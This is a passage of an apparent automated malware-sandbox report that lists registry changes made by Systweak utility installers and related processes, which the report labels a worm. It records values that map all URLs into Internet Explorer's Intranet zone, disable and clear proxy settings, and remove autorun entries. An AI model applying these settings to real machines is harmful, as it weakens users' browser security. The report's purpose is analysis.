"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"Inno Setup: Setup Version" = "5.5.4 (u)"
[HKLM\SOFTWARE\System Speedup\LANG]
"LangID" = "0"
[HKLM\SOFTWARE\System Speedup]
"utm_campaign" = "sbinstall3"
[HKCU\Software\System Speedup]
"StartAutoScanPMUI" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Systweak\ssd]
"ASO3AFFILIATE" = ""
[HKLM\SOFTWARE\Systweak\Params]
"utm_source" = "sbinstall3"
[HKLM\SOFTWARE\System Speedup]
"InstallASP" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"MinorVersion" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"HelpLink" = "http://www.systemspeedup.com/"
"QuietUninstallString" = "%Program Files%\System Speedup\unins000.exe /SILENT"
[HKLM\SOFTWARE\Systweak\ssd]
"ASOBUILDFOR" = "sbinstall3"
[HKCU\Software\systweak\ssd]
"ASO3AFFILIATE" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Systweak\Params]
"noamzonoffer_onuninstall" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 60 09 92 03 FA 10 61 EF F2 2E FD AD 1C 55 6F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"MajorVersion" = "2"
[HKCU\Software\System Speedup]
"TrialType" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Systweak\ssd]
"ASO3CAM" = "sbinstall3"
[HKLM\SOFTWARE\System Speedup]
"MaxFixLimit" = "15"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"NoRepair" = "1"
"Inno Setup: App Path" = "%Program Files%\System Speedup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Systweak\Params]
"affiliateid" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"Inno Setup: Language" = "en"
"InstallLocation" = "%Program Files%\System Speedup\"
[HKLM\SOFTWARE\System Speedup]
"TELNO" = "(800) 851-0654"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"DisplayIcon" = "%Program Files%\System Speedup\SystemSpeedup.exe"
[HKLM\SOFTWARE\System Speedup]
"InstallRightBackup" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\System Speedup_is1]
"URLInfoAbout" = "http://www.systemspeedup.com/"
[HKCU\Software\System Speedup\LANG]
"LangCode" = "en"
The process aspsetup.tmp:4036 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"DisplayVersion" = "2.1.1000.13665"
[HKLM\SOFTWARE\Systweak\Params]
"utm_campaign" = "sbinstall3"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"RenewNowURLADU" = "http://powerbundle.systweak.com/pb/renewal/?pname=adu&"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"HelpLink" = "http://www.systweak.com/antispyware/"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"BuyNowURLASP" = "http://powerbundle.systweak.com/pb/price/?pname=asp&"
"x-at" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"NoRepair" = "1"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"utm_medium" = "newbuild"
[HKLM\SOFTWARE\Systweak\Params]
"TELNO" = "(800) 859-6475"
"utm_medium" = "newbuild"
[HKCU\Software\Systweak\Advanced System Protector\LANG]
"LangID" = "0"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"showfthsetting" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"DisplayIcon" = "%Program Files%\ASP\AdvancedSystemProtector.exe"
"Inno Setup: Language" = "en"
[HKLM\SOFTWARE\Systweak\ssd]
"ASOBUILDFOR" = "sbinstall3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"utm_campaign" = "sbinstall3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"BuyNowURLRCP" = "http://powerbundle.systweak.com/pb/price/?pname=rcp&"
[HKCU\Software\Systweak\Advanced System Protector]
"TELNO" = "(800) 859-6475"
"utm_campaign" = "sbinstall3"
[HKCU\Software\systweak\ssd]
"ASOBUILDFOR" = "sbinstall3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"DisplayName" = "Advanced-System Protector"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"InstalledPath" = "%Program Files%\ASP"
"BuyNowURLADU" = "http://powerbundle.systweak.com/pb/price/?pname=adu&"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"Publisher" = "Systweak Software"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Systweak\Params]
"utm_source" = "sbinstall3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"InstallDate" = "20140813"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"TELNOJA" = "03-4578-1515"
[HKCU\Software\Systweak\Advanced System Protector]
"InstalledPath" = "%Program Files%\ASP"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"BuyNowURLPB" = "http://powerbundle.systweak.com/PB/purchase/?pname=asp&"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"MinorVersion" = "1"
[HKCU\Software\systweak\ssd]
"ASO3AFFILIATE" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"Inno Setup: App Path" = "%Program Files%\ASP"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE F5 27 2A C7 FD D2 D3 B6 A6 BE 03 6C 65 FF 7B"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"affiliateid" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"QuietUninstallString" = "%Program Files%\ASP\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"Inno Setup: Setup Version" = "5.5.1 (u)"
"MajorVersion" = "2"
[HKCU\Software\systweak\ssd]
"ASO3CAM" = "sbinstall3"
[HKLM\SOFTWARE\Systweak\Advanced System Protector\LANG]
"LangCode" = "en"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"showbc" = "1"
"isphone" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Systweak\Advanced System Protector]
"utm_source" = "sbinstall3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"IsScanOptional" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"NoModify" = "1"
[HKLM\SOFTWARE\Systweak\ssd]
"ASO3AFFILIATE" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"afterInstallUrl" = "http://powerbundle.systweak.com/ASP/firstinstall/?newasp=1&utm_content=AfterInstall&utm_term=Setup&page=install&"
"showpb" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"InstallLocation" = "%Program Files%\ASP\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"RenewNowURLASP" = "http://powerbundle.systweak.com/pb/renewal/?pname=asp&"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Systweak\Params]
"x-at" = ""
[HKCU\Software\Systweak\Advanced System Protector]
"affiliateid" = ""
"utm_medium" = "newbuild"
"x-at" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"URLInfoAbout" = "http://www.systweak.com/antispyware/"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"showfth" = "1"
"showsm" = "1"
"TELNO" = "(800) 859-6475"
[HKLM\SOFTWARE\Systweak\Params]
"affiliateid" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"Inno Setup: Icon Group" = "Advanced System Protector"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"BuyNowURL" = "http://www.systweak.com/antispyware/iprice.asp?"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"RenewNowURL" = "http://www.systweak.com/antispyware/iprice.asp?renew=1&"
"RenewNowURLPB" = "http://powerbundle.systweak.com/PB/pbrenewal/?pname=asp&"
"RenewNowURLRCP" = "http://powerbundle.systweak.com/pb/renewal/?pname=rcp&"
"IsSilent" = "1"
[HKLM\SOFTWARE\Systweak\Advanced System Protector\LANG]
"LangID" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Systweak\ssd]
"ASO3CAM" = "sbinstall3"
[HKCU\Software\Systweak\Advanced System Protector]
"TELNOFR" = " 33 975 184 234"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~B9F029BF_is1]
"UninstallString" = "%Program Files%\ASP\unins000.exe"
[HKLM\SOFTWARE\Systweak\Advanced System Protector]
"TELNOFR" = " 33 975 184 234"
"utm_source" = "sbinstall3"
[HKCU\Software\Systweak\Advanced System Protector\LANG]
"LangCode" = "en"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Worm deletes the following value(s) in system registry:
The Worm disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Advanced System Protector_startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Advanced System Protector"
"Advanced System Protector_startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Advanced System Protector"
The process rightbackupsetup.exe:3220 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D F8 5D 04 DF 38 39 F7 16 8F B4 B5 76 8A 68 F6"
The process Reporter.exe:2608 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 40 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Reporter\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 03 6E 58 27 2D 5B B2 21 14 86 81 BE 7A 6F 8D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Reporter\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
The process Reporter.exe:3008 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 9F A0 23 1C 9D 5A FC C8 85 B5 5C 65 6B 63 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ~ahwapkv.exe:1512 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft]
